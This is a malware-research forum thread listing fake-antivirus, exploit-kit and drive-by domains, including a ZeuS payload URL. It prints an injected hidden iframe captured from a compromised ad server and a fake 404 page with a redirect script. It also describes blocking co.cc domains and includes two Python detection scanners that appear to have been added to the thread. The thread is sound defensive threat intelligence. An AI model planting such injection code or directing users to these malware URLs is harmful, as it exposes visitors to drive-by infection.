Malware Domain List

Malware Related => Malicious Domains => Topic started by: eoin.miller on June 18, 2010, 04:30:09 pm

Title: Malicious Domains - eoin.miller
Post by: eoin.miller on June 18, 2010, 04:30:09 pm
This thread is for the one-offs we find.

Fake Scanner Pages:
www2.routesave19.co.cc
www2.netguard37-pd.co.cc

http://www2.routesave19.co.cc/Images/loading.gif
http://www2.routesave19.co.cc/Layouts/Landings/CentralLandings/7/images/list/main_sprite.jpg
Title: Re: Malicious Domains - eoin.miller
Post by: eoin.miller on June 21, 2010, 04:24:58 pm
FakeAV-infected clients POSTing to:

wellsellit.com

http://wellsellit.com/borders.php
Title: Re: Malicious Domains - eoin.miller
Post by: eoin.miller on June 22, 2010, 09:01:19 pm
Exploited clients posting to:

lolopingtroll.org/stats/gate.php?id=84fefcb9

and pulling from:

pulselocums.com.au/media/sound.exe

VirusTotal says it's ZeuS:
http://www.virustotal.com/analisis/191d6ac238d6684a385380826bcf34f2698632c2ca9fbc57f4143b0310ea5cc0-1277240374
Title: Re: Malicious Domains - eoin.miller
Post by: eoin.miller on June 22, 2010, 09:10:09 pm
Fake Scanners:

www1.softscaner35.co.cc
www1.softscaner36.co.cc
www2.newbless6.co.cc
www1.softscaner34.co.cc

All have the following URL accessible:
/Layouts/Landings/CentralLandings/7/images/list/main_sprite.jpg
Title: Re: Malicious Domains - eoin.miller
Post by: eoin.miller on June 25, 2010, 04:47:09 pm
More fake scanner pages:

http://www1.trytocleanit-45p.co.cc
http://www1.avsolution31pr.co.cc
http://www2.lordofsave9.co.cc
http://www2.lordofsave4.co.cc
Title: Re: Malicious Domains - eoin.miller
Post by: eoin.miller on June 28, 2010, 05:08:03 pm
Fake Scanners:

www1.glory4.co.cc
www1.glory3.co.cc
Title: Re: Malicious Domains - eoin.miller
Post by: eoin.miller on July 06, 2010, 06:50:01 pm
Fake Scanner Pages:
www1.oksave9.co.cc

Redirectors to Fake Scanner Pages:
www3.avsolution42.co.cc
Title: Re: Malicious Domains - eoin.miller
Post by: eoin.miller on July 06, 2010, 08:36:49 pm
FakeAV page:

http://antivirglass.com/purchase?pgid=2&r=57.5
Title: Re: Malicious Domains - eoin.miller
Post by: eoin.miller on July 09, 2010, 05:13:17 pm
FakeAV:
http://business.one.strangled.net/3/?c=917

Redirects to FakeAV:
http://pivfeels.com/mytds/go.php?s=17
Title: Re: Malicious Domains - eoin.miller
Post by: eoin.miller on July 09, 2010, 05:27:29 pm
Phoenix Exploit kit:

http://decorum76.info/e9t/

More domains on same IP with exploit kits:

decoy56.info/e9t/
extraditelbds.info/e9t/
erratic335.info/e9t/
magnatevhl8.info/q8s/
bristlejfgj8.info/e9t/
inclination19y.info/x0c/
Title: Re: Malicious Domains - eoin.miller
Post by: eoin.miller on July 13, 2010, 05:15:25 pm
Drive-bys with very low detection rates (1/41):

http://domger.in/d/

VirusTotal Payload Results:
http://www.virustotal.com/analisis/1f75ef5ae8b8c0a8cc13242cd22a75c0e45f443b9a6fe8906287b9c1e6bbb3bb-1279005248
Title: Re: Malicious Domains - eoin.miller
Post by: eoin.miller on July 15, 2010, 04:58:06 pm
Phoenix drive by kits:

http://whetcb67.info/n21/ - drive-by
http://fglq.info/n2l/l.php?i=3 - payload
Title: Re: Malicious Domains - eoin.miller
Post by: eoin.miller on July 20, 2010, 10:11:44 pm
http://333.gorgrengos.com/b/index.php - drive-by
Title: Re: Malicious Domains - eoin.miller
Post by: eoin.miller on September 01, 2010, 08:03:57 pm
Drive-by:

www.hezhexh.co.cc/x33/

Seeing hacked forums redirect to this (via rpzrtru.co.cc/tds/in.cgi?default). Example of a hacked forum link that leads to this drive-by:

http://www.bicycles.net.au/forums/viewtopic.php?f=9&t=31289&start=25
Title: Re: Malicious Domains - eoin.miller
Post by: SysAdMini on September 01, 2010, 08:34:35 pm
> Drive-by:
>
> www.hezhexh.co.cc/x33/
>
> Seeing hacked forums redirect to this (via rpzrtru.co.cc/tds/in.cgi?default). Example of a hacked forum link that leads to this drive-by:
>
> http://www.bicycles.net.au/forums/viewtopic.php?f=9&t=31289&start=25

The OpenX adserver has been compromised.

http://www.bicycles.net.au/adserver/www/delivery/spc.php?zones=1|2|3
Code:
var OA_output = new Array();
OA_output['1'] = '';

OA_output['2'] = '';

OA_output['3'] = '';
OA_output['3'] += "<"+"a href=\'http://www.bicycles.net.au/adserver/www/delivery/ck.php?oaparams=2__bannerid=20__zoneid=3__cb=82c8d8ab02__oadest=http%3A%2F%2Fwww.cyclechallenge.com%2FThe-Event-1%2FInternational-Riders%2FWin-a-trip-to-Cycle-Challenge%2Fdefault.aspx\' target=\'_blank\'><"+"img src=\'http://www.bicycles.net.au/adserver/www/images/b9e4c50eff89401296bf4b6e66125934.gif\' width=\'120\' height=\'80\' alt=\'Competition: Contact Lake Taupo Cycle Challenge\' title=\'Competition: Contact Lake Taupo Cycle Challenge\' border=\'0\' /><"+"/a><"+"div id=\'beacon_82c8d8ab02\' style=\'position: absolute; left: 0px; top: 0px; visibility: hidden;\'><"+"img src=\'http://www.bicycles.net.au/adserver/www/delivery/lg.php?bannerid=20&amp;campaignid=8&amp;zoneid=3&amp;cb=82c8d8ab02\' width=\'0\' height=\'0\' alt=\'\' style=\'width: 0px; height: 0px;\' /><"+"/div><"+"iframe src=\"http://rpzrtru.co.cc/tds/in.cgi?default\" width=\"1\" height=\"1\" hspace=\"0\" vspace=\"0\" frameborder=\"0\" scrolling=\"no\"><"+"/iframe>\n";
Title: Re: Malicious Domains - eoin.miller
Post by: eoin.miller on September 03, 2010, 05:26:26 pm
borat-carrer.com/img/index.php - Phoenix Exploit Kit
Title: Re: Malicious Domains - eoin.miller
Post by: eoin.miller on September 03, 2010, 09:30:34 pm
trade-yourauto.info/s/index.php - Phoenix Exploit Kit
trade-yourauto.info/s/tmp/des.jar - Java Exploit
Title: Re: Malicious Domains - eoin.miller
Post by: eoin.miller on September 07, 2010, 05:59:51 pm
jazzstibbtm.com/aa/index.php - phoenix exploit kit
79.135.152.222/a/index.php - phoenix exploit kit
brittnom.com/038512946/news.php - phoenix exploit kit

http://193.169.235.225/?q=Z5249FKA1J61R99H14NWY1W0J6VOWW67ZECX0K1Y8N4DO010Y52DNG9D847NNN4TV4VL0Y9V79UU09XWZW8D9ZE50K0XEJISRkiJU06WW47XUUpVmsnMyVaMkk2Qj8iMitKBmlybWoCfB9uCGANdzMBTQElAU50d3BfdlkMACh%252BegVkbw1veFZgW28CXWFmVl09Nj9nATgIaH0GCH0GAQcGTSM4NQ%253D%253D - Fake Scanner Page

http://193.169.235.225/?q=asdf - payload (can be anything after the q= really)
Title: Re: Malicious Domains - eoin.miller
Post by: eoin.miller on September 07, 2010, 08:00:28 pm
http://h26heh1.co.cc/x6dmrk2/ - drive-by

jsunpack results:
http://jsunpack.jeek.org/dec/go?report=8f812b03d3390d1476b1c4f112e62cd4c8496ae2
Title: Re: Malicious Domains - eoin.miller
Post by: eoin.miller on September 07, 2010, 08:34:44 pm
http://stepanola.in:8080/axb/ - drive-by (Eleonore IIRC)
Title: Re: Malicious Domains - eoin.miller
Post by: eoin.miller on December 06, 2010, 04:16:34 pm
Phoenix Exploit Kit:
68.68.20.113 - fun.anexelymoweq.in

Redirector (second stage):
78.46.75.144 - verystrangeone.com/in.cgi?13

Redirector (first stage):
174.137.146.174 - 174.137.146.174/?cbb=27867330230596
Title: Re: Malicious Domains - eoin.miller
Post by: eoin.miller on January 07, 2011, 11:32:15 pm
Seeing this one being redirected to by hacked Drupal websites:

Phoenix Exploit Kit:
62.122.73.51 - http://besimorr.com/images/start.php?id=vlnd

Other hostnames via passive DNS:

62.122.73.52 seems to be bound to the same host as well:

Code:
boxberil.com  A  62.122.73.52
shoughbo.com  A  62.122.73.52
ns1.shoughbo.com  A  62.122.73.52
ns2.shoughbo.com  A  62.122.73.52
delilit.com  A  62.122.73.52
youtubesxx.com  A  62.122.73.52

heh:
/home/shayai/public_html/index.php

I <3 php error reporting
Title: Re: Malicious Domains - eoin.miller
Post by: eoin.miller on January 12, 2011, 08:46:11 am
Another phoenix kit having traffic driven to it from exploited domains:

http://boxberil.com/images/start.php?id=vlnd
Title: Re: Malicious Domains - eoin.miller
Post by: eoin.miller on January 12, 2011, 07:34:44 pm
More phoenix:

91.193.192.90 - http://7tokk.cz.cc/vo/ithsaoj.php

Uses SEO poisoning to drive users to it.
Title: Re: Malicious Domains - eoin.miller
Post by: Seedler on January 12, 2011, 09:25:16 pm
A while back I configured DNS to not resolve any co.cc or cz.cc domains at all. I have not had any business impact after doing this, and this is for a Fortune 500 company. I recommend you do the same.

-Seedler
Title: Re: Malicious Domains - eoin.miller
Post by: SysAdMini on January 12, 2011, 11:27:23 pm
> A while back I configured DNS to not resolve any co.cc or cz.cc domains at all. I have not had any business impact after doing this, and this is for a Fortune 500 company. I recommend you do the same.
>
> -Seedler

I blocked co.cc and cz.cc domains on proxy servers of a large company and haven't had any business impact. I can recommend that too.
Title: Re: Malicious Domains - eoin.miller
Post by: eoin.miller on January 14, 2011, 10:40:19 pm
> > A while back I configured DNS to not resolve any co.cc or cz.cc domains at all. I have not had any business impact after doing this, and this is for a Fortune 500 company. I recommend you do the same.
> >
> > -Seedler
>
> I blocked co.cc and cz.cc domains on proxy servers of a large company and haven't had any business impact. I can recommend that too.

We do that as well for an 80k+ user network. I also wrote the Snort sigs that look for these domains in HTTP requests and alert on them as suspicious through the EmergingThreats snort users group ;)
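The DNS block, the proxy block and the HTTP-request signatures the posters describe all reduce to one test: does the requested host sit inside co.cc or cz.cc, matched on label boundaries so that a host like notco.cc is not swept up. As an added example (not the posters' configuration and not the EmergingThreats signatures), a Python checker run over constructed proxy-style log lines:

```python
from urllib.parse import urlparse

# Free-subdomain zones the posters above block outright at DNS and proxy level.
BLOCKED_ZONES = ('co.cc', 'cz.cc')

def in_blocked_zone(host: str, zones=BLOCKED_ZONES) -> bool:
    """True when host is a blocked zone or a label-aligned subdomain of it.
    A bare endswith('co.cc') would wrongly match 'notco.cc', so compare on
    label boundaries; 'co.cc.example.net' must not match either."""
    host = host.lower().rstrip('.').split(':')[0]      # drop trailing dot and :port
    return any(host == z or host.endswith('.' + z) for z in zones)

# Constructed proxy-style log lines: "<time> <client> <method> <url>".  The layout
# is an assumption for this example, not any particular product's log format.
SAMPLE_LOG = """\
2011-01-14T22:40:01Z 10.1.2.3 GET http://www1.glory4.co.cc/
2011-01-14T22:40:02Z 10.1.2.3 GET http://www.example.com/index.html
2011-01-14T22:40:03Z 10.1.2.4 GET http://7tokk.cz.cc/vo/ithsaoj.php
2011-01-14T22:40:04Z 10.1.2.5 GET http://notco.cc/
2011-01-14T22:40:05Z 10.1.2.6 GET http://co.cc.example.net/
2011-01-14T22:40:06Z 10.1.2.7 GET http://www2.newbless6.co.cc:8080/scan
"""

def flag_requests(log_text: str, zones=BLOCKED_ZONES) -> list:
    """Return (client, host) for every request whose host falls in a blocked zone,
    i.e. what a proxy block or an HTTP Host-header signature would fire on."""
    hits = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) < 4:
            continue
        host = urlparse(fields[3]).hostname or ''   # hostname is lower-cased, port removed
        if in_blocked_zone(host, zones):
            hits.append((fields[1], host))
    return hits

if __name__ == '__main__':
    for client, host in flag_requests(SAMPLE_LOG):
        print(f'{client} -> {host}')
```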
Title: Re: Malicious Domains - eoin.miller
Post by: eoin.miller on January 14, 2011, 10:41:46 pm
More Phoenix:
thruleni.com/images/start.php?id=wag5 - 62.122.73.53

IP is already in the MDL with another hostname but is listed as "fake av".
Title: Re: Malicious Domains - eoin.miller
Post by: eoin.miller on February 02, 2011, 07:03:36 pm
Phoenix Kits:

advancedwebanalytic.com/stats/fnktcnfza3.php
zlenbigret.com/03oofm059mw.php?s=IBCCL

Title: Re: Malicious Domains - eoin.miller
Post by: eoin.miller on February 14, 2011, 07:57:40 pm
More phoenix:

web-statistics-css.ru/n3/xndobob.php

Anyone going to bible.com is getting redirected to this currently.
Title: Re: Malicious Domains - eoin.miller
Post by: eoin.miller on March 21, 2011, 06:43:19 pm
More Phoenix:

www.zanupoits.com
http://www.zanupoits.com/722quoct6k.php?s=IBCCM

Looks to be fluxing.
Title: Re: Malicious Domains - eoin.miller
Post by: eoin.miller on March 24, 2011, 10:48:30 pm
174.127.87.104 - various host names

This is redirecting to lots of fake scanner pages like freeantiagencyxp.com. Definitely needs to be listed. Doing some more intel on this now....

Code:
GET /?s=18 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */*
Referer: http://getmediacontent.com/145/40brands/banner.html
Accept-Language: en-us
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; .NET CLR 2.0.50727)
Host: 30kuil1.iodelivery.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Thu, 24 Mar 2011 13:53:28 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Content-Length: 861
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
  <head>
  <meta http-equiv="content-type" content="text/html; charset=uft8">
  <title>404 Not Found</title>
  <script>
if (window.top != window.parent.parent) window.top.location.href="http://xpscanantiviruscentral.com/index2.php?06abQDU9QUDBV2v7rCw7i8WveTo6MHVmLVpZeCOrV1lTN5AlQy2K";
</script>
  </head>
  <body>
<h1>Not Found</h1>
<p>The requested URL /index.html was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.
</p>
<hr>
<address>Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Port 80</address>
  </body>
</html>
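The two injected responses in this thread share one shape: a body the site owner did not write that pulls the visitor off-site, either as a 1x1 iframe spliced into the OpenX ad output (the bicycles.net.au post above) or as a frame-escaping top.location assignment buried in a fake 404 (the exchange just quoted). As an added example, not code from the thread, a Python scanner that finds both patterns in a response body, run here over constructed, shortened copies of the two bodies quoted on this page:

```python
import re
from urllib.parse import urlparse

# The compromised OpenX output quoted above emits tags as "<"+"iframe" so the
# HTML only exists after string concatenation; rejoin the pieces first.
def normalize(body: str) -> str:
    return body.replace('"+"', '').replace("'+'", '')

IFRAME_RE = re.compile(r'<iframe\b([^>]*)>', re.I)
ATTR_RE = re.compile(r'(\w+)\s*=\s*\\?["\']([^"\'\\]*)')          # tolerates JS-escaped quotes
TOPNAV_RE = re.compile(r'(?:window\.)?top\.location(?:\.href)?\s*=\s*["\']([^"\']+)')

def _host(url: str) -> str:
    return (urlparse(url).hostname or '').lower()

def find_offsite_redirects(body: str, serving_host: str) -> list:
    """Return (kind, target_host) pairs for 0/1-pixel third-party iframes and
    frame-escaping top.location assignments found in one HTTP response body."""
    hits, text, serving_host = [], normalize(body), serving_host.lower()
    for m in IFRAME_RE.finditer(text):
        attrs = {k.lower(): v for k, v in ATTR_RE.findall(m.group(1))}
        tiny = any(attrs.get(d, '').rstrip('px') in ('0', '1') for d in ('width', 'height'))
        target = _host(attrs.get('src', ''))
        if target and target != serving_host and tiny:
            hits.append(('hidden_iframe', target))
    for m in TOPNAV_RE.finditer(text):
        target = _host(m.group(1))
        if target and target != serving_host:
            hits.append(('top_redirect', target))
    return hits

# Constructed, shortened copies of the two responses quoted in this thread.
OPENX_SPC = r'''OA_output['3'] += "<"+"a href=\'http://www.bicycles.net.au/adserver/www/delivery/ck.php?bannerid=20\' target=\'_blank\'><"+"img src=\'http://www.bicycles.net.au/adserver/www/images/b9e4c50eff89401296bf4b6e66125934.gif\' width=\'120\' height=\'80\' /><"+"/a><"+"iframe src=\"http://rpzrtru.co.cc/tds/in.cgi?default\" width=\"1\" height=\"1\" frameborder=\"0\"><"+"/iframe>\n";'''
FAKE_404 = r'''<html><head><title>404 Not Found</title><script>
if (window.top != window.parent.parent) window.top.location.href="http://xpscanantiviruscentral.com/index2.php?06abQDU9QUDBV2v7rCw7i8WveTo6MHVmLVpZeCOrV1lTN5AlQy2K";
</script></head><body><h1>Not Found</h1></body></html>'''

def scan_samples() -> dict:
    return {
        'www.bicycles.net.au': find_offsite_redirects(OPENX_SPC, 'www.bicycles.net.au'),
        '30kuil1.iodelivery.com': find_offsite_redirects(FAKE_404, '30kuil1.iodelivery.com'),
    }

if __name__ == '__main__':
    for host, hits in scan_samples().items():
        print(host, '->', hits or 'clean')
```

The legitimate banner, image and beacon references in the OpenX output point back at the serving host and are left alone; only the foreign 1x1 iframe and the off-site top-frame redirect are reported.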